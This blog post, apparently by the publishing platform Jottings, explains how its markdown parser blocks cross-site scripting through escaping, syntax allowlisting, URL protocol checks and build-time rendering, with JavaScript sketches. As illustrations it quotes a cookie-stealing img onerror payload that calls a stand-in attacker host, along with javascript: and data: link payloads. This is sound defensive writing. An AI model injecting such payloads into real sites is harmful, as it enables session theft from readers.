XSS Protection in Our Markdown Parser

Building a platform where users publish content is exciting—but it comes with real responsibility. When you give people the ability to write and share, you need to think carefully about what they can inject into the system. That's why XSS (Cross-Site Scripting) protection isn't an afterthought at Jottings. It's baked into the foundation of how we parse and render markdown.

Let me walk you through why this matters, and how we actually prevent these attacks.

Why Should You Care About XSS?

Imagine someone pastes this into their Jottings post:

Check out my site: <img src=x onerror="fetch('https://attacker.com/steal?data='+document.cookie)">

Without proper protection, that malicious script executes in every reader's browser. It could steal cookies, redirect to phishing sites, or worse—compromise your entire site's security.

XSS attacks are particularly dangerous in platforms like Jottings because:

  • Reach: Your content is public. Attacks spread to every visitor.
  • Trust: Readers visit your site because they trust you. Compromising that is devastating.
  • Persistence: User-generated content lives in your database. The attack persists until you clean it up.

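This isn't theoretical. Major platforms have been hit by XSS vulnerabilities: the Samy worm spread across more than a million MySpace profiles in under a day in 2005, and a stored XSS bug in TweetDeck produced self-retweeting tweets in 2014. It's why we made security a core principle from day one.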

Our Escaping Strategy

At Jottings, we take a simple but powerful approach: we escape HTML special characters before rendering markdown.

Here's the core principle: we treat all user input as plain text first. When we parse markdown, we don't allow arbitrary HTML tags. Instead, we parse markdown syntax (bold, italics, links, etc.) and generate safe HTML that can't contain malicious scripts.

The key insight is this: escaping is the default. We escape these dangerous characters:

  • < becomes &lt;
  • > becomes &gt;
  • & becomes &amp;
  • " becomes &quot;
  • ' becomes &#x27;

This means if someone tries to inject <script>alert('xss')</script>, the HTML we emit is:

&lt;script&gt;alert(&#x27;xss&#x27;)&lt;/script&gt;

The browser displays this to readers as literal text, not executable code. The malicious intent is neutralized.

Our Specific Protections

We built these defenses into the Jottings markdown parser:

1. All User Input is Escaped by Default

In our processPlainText() function, every character that could start an HTML tag is escaped. This is the safety net that catches anything we might miss elsewhere.

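// Sketch of our escaping logic (escapeHtml is an illustrative name).
// & must be replaced first; otherwise the & in the entities produced by
// the later replacements would be escaped a second time.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}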

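This happens automatically for non-PRO users. Pre-encoded input gets no special treatment either: because & is escaped too, someone who types &lt;script&gt; sees exactly those characters on the page, not a tag. Mixed-case tags and malformed markup fail the same way, since < and > never reach the output unescaped.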

2. Markdown Parser Only Allows Safe Syntax

Our custom markdown parser only recognizes specific markdown constructs:

  • Bold: **text**
  • Italic: *text* or _text_
  • Links: [text](url)
  • Code blocks: ```...```
  • Blockquotes: > text
  • Headings: # text

We don't parse HTML directly from user input. No <div> tags, no onclick handlers, no script tags. This fundamental design choice makes XSS attacks nearly impossible.
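To make the "escape first, then parse" order concrete, here is a minimal sketch. It is not our production parser: the names escapeHtml and renderInline are made up for this post, and it only handles bold and italic.

```javascript
// Hypothetical sketch: names and regexes are illustrative, not the real parser.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

function escapeHtml(text) {
  // One pass over the input, so entities we produce are never escaped again.
  return String(text).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

function renderInline(raw) {
  // Step 1: escape everything, so no user-typed tag survives.
  const safe = escapeHtml(raw);
  // Step 2: turn the supported markers into tags that we generate ourselves.
  return safe
    .replace(/\*\*(.+?)\*\*/g, '<strong>$1</strong>')
    .replace(/\*(.+?)\*/g, '<em>$1</em>');
}

console.log(renderInline('**bold** and <b onclick="x()">not bold</b>'));
```

The only tags in the output are the ones the renderer wrote itself. The user's own <b onclick=...> comes out as visible text.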

3. Link URLs Are Validated

Even URLs can be a vector for attacks. Someone might try:

[click me](javascript:alert('xss'))
[click me](data:text/html,<script>alert('xss')</script>)

We validate that links start with safe protocols: http://, https://, or mailto:. Anything else is stripped or converted to plain text.
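A protocol check like this can be sketched with the standard URL class available in browsers and Node.js. The helper name isSafeLinkUrl is hypothetical, and rejecting anything that fails to parse (including relative links) is an assumption made for the example, not a description of our exact rules.

```javascript
// Hypothetical helper: the name and the reject-on-parse-failure policy are assumptions.
const SAFE_PROTOCOLS = new Set(['http:', 'https:', 'mailto:']);

function isSafeLinkUrl(href) {
  let parsed;
  try {
    // The URL parser lowercases the scheme and strips stray whitespace,
    // so "JaVaScRiPt:" or " javascript:" cannot slip past the check.
    parsed = new URL(String(href).trim());
  } catch {
    return false; // Not an absolute URL: reject rather than guess.
  }
  return SAFE_PROTOCOLS.has(parsed.protocol);
}

console.log(isSafeLinkUrl('https://example.com/post'));   // true
console.log(isSafeLinkUrl('mailto:hello@example.com'));   // true
console.log(isSafeLinkUrl("javascript:alert('xss')"));    // false
console.log(isSafeLinkUrl("data:text/html,<script>alert('xss')</script>")); // false
```

Comparing the parsed protocol against an allowlist is sturdier than a startsWith check on the raw string, because the parser has already normalized the tricks attackers use to disguise a scheme.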

4. Media Objects Preserve Source Information

When users share images or media, we embed the full metadata directly in the content:

{
  "type": "image",
  "url": "https://static.jottings.me/...",
  "filename": "safe-filename.jpg",
  "alt": "User provided alt text (also escaped)"
}

The URL comes directly from our CDN (static.jottings.me), so we control the source. User alt text is escaped like any other content. No surprise scripts hidden in attributes.
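As a rough illustration of how a media object like that could be turned into an image tag, here is a sketch. The names renderImage and escapeAttr and the example path are hypothetical. It assumes the only checks needed are the type, an https URL on static.jottings.me, and escaped alt text.

```javascript
// Hypothetical sketch: renderImage, escapeAttr and MEDIA_HOST are illustrative names.
const MEDIA_HOST = 'static.jottings.me';

function escapeAttr(value) {
  // Numeric character references for the five HTML-significant characters.
  return String(value).replace(/[&<>"']/g, (ch) => `&#${ch.charCodeAt(0)};`);
}

function renderImage(media) {
  let url;
  try {
    url = new URL(media.url);
  } catch {
    return ''; // Unparseable URL: render nothing.
  }
  // Compare the parsed hostname exactly; a prefix match on the raw string
  // would also accept hosts like static.jottings.me.evil.example.
  if (media.type !== 'image' || url.protocol !== 'https:' || url.hostname !== MEDIA_HOST) {
    return '';
  }
  return `<img src="${escapeAttr(url.href)}" alt="${escapeAttr(media.alt || '')}">`;
}

console.log(renderImage({
  type: 'image',
  url: 'https://static.jottings.me/example.jpg', // made-up path for the example
  alt: 'x" onerror="alert(1)',
}));
```

The quote in the alt text is emitted as &#34;, so it cannot close the attribute and start a new one.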

5. Build-Time HTML Generation

Here's a detail I'm proud of: we generate HTML at build time, not runtime. When you publish a jot, our build processor:

  1. Reads your raw markdown text
  2. Parses it with our custom parser
  3. Generates safe HTML
  4. Stores the static HTML on our CDN

This means:

  • No dynamic execution of untrusted code
  • Consistent rendering everywhere
  • We can audit every piece of HTML before it goes live
  • Performance is incredible (static files, cached globally)
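The audit point is easiest to picture as a check that runs on the generated HTML just before it is stored. The sketch below is only an illustration: auditHtml and the tag allowlist are assumptions based on the markdown constructs listed earlier, and a regex scan like this is a coarse safety net, not a full HTML parser.

```javascript
// Hypothetical audit step: the allowlist is an assumption, not real configuration.
const ALLOWED_TAGS = new Set([
  'p', 'strong', 'em', 'a', 'pre', 'code', 'blockquote', 'img',
  'h1', 'h2', 'h3', 'h4', 'h5', 'h6',
]);

function auditHtml(html) {
  const problems = [];
  // Matches opening and closing tags, capturing the tag name and its attributes.
  const tagPattern = /<\/?([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/g;
  for (const [, name, attrs] of html.matchAll(tagPattern)) {
    const tag = name.toLowerCase();
    if (!ALLOWED_TAGS.has(tag)) problems.push(`disallowed tag <${tag}>`);
    // Inline event handlers (onclick, onerror, ...) should never be generated.
    if (/\son[a-z]+\s*=/i.test(attrs)) problems.push(`event handler on <${tag}>`);
  }
  return problems;
}

console.log(auditHtml('<p><strong>fine</strong></p>'));
console.log(auditHtml('<p><img src=x onerror="steal()"></p>'));
```

A build could refuse to publish whenever the returned list is non-empty, which turns a parser bug into a failed build instead of a live vulnerability.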

Why This Matters Beyond Security

Beyond preventing attacks, our escaping strategy has benefits:

Predictability: You know exactly what markdown syntax we support. No surprises when your content renders.

Performance: Static HTML means your readers get lightning-fast page loads. No parsing happens in their browser.

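Simplicity: Our approach is straightforward. We don't need a complex HTML sanitizer that can miss edge cases. Escaping every special character is easy to reason about and easy to test, and the few places where escaping alone is not enough (link URLs, for example) get their own explicit checks.

User Control: If you want to write about code, HTML, or dangerous concepts, you can. The text renders safely, and readers see it as an example, not executable code.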

A Trust Issue

Look, the reason I'm writing this is simple: Jottings is a publishing platform, and trust is everything.

When you publish here, you trust us to:

  • Keep your content private until you publish it
  • Display it safely to readers
  • Protect your readers from harm
  • Maintain the integrity of your work

XSS protection is just one part of that promise. But it's a crucial part. A single vulnerability could compromise that trust, and we can't have that.

Every design decision we made—the custom markdown parser, the build-time HTML generation, the escaped user input—comes down to this: you should be able to publish freely, and your readers should be able to browse safely.

Next Steps

If you're building your own platform and want to prevent XSS attacks, here's what I'd recommend:

  1. Escape by default: Treat user input as plain text unless proven safe
  2. Whitelist, don't blacklist: Only allow specific markdown syntax, not all HTML
  3. Validate URLs: Restrict protocols to safe ones (http, https, mailto)
  4. Use libraries carefully: If you use a markdown parser, understand how it handles security
  5. Test with malicious input: Try to break your own parser with known XSS payloads
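For the last recommendation, a tiny harness is enough to get started. This sketch is hypothetical throughout: findUnsafeOutputs, the payload list, and the two toy renderers are made up for illustration, and the regex checks only catch the most obvious failures.

```javascript
// Hypothetical harness: the names and the payload list are illustrative.
const PAYLOADS = [
  "<script>alert('xss')</script>",
  '<img src=x onerror="alert(1)">',
  "[click me](javascript:alert('xss'))",
  "[click me](data:text/html,<script>alert('xss')</script>)",
];

// Returns the payloads whose rendered output still looks dangerous.
function findUnsafeOutputs(render, payloads = PAYLOADS) {
  return payloads.filter((payload) => {
    const html = render(payload);
    const hasRawTag = /<\s*(script|img|iframe|svg)\b/i.test(html);
    const hasBadHref = /href\s*=\s*["']?\s*(javascript|data):/i.test(html);
    return hasRawTag || hasBadHref;
  });
}

// Two toy renderers: one passes input through untouched, one escapes it.
const identity = (s) => s;
const escapeOnly = (s) => s.replace(/[&<>"']/g, (ch) => `&#${ch.charCodeAt(0)};`);

console.log(findUnsafeOutputs(identity).length);   // 3
console.log(findUnsafeOutputs(escapeOnly).length); // 0
```

Swap in your real render function and extend the payload list over time; every payload that comes back from findUnsafeOutputs is a bug to fix before shipping.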

We're open about how Jottings works because security through obscurity isn't real security. Our code is transparent, and we welcome security researchers to review it.

If you find a vulnerability or have suggestions for improving our protection, please reach out. Security is never "done"—it's an ongoing process of learning and improving.

That's the Jottings promise: a safe space to publish what matters to you.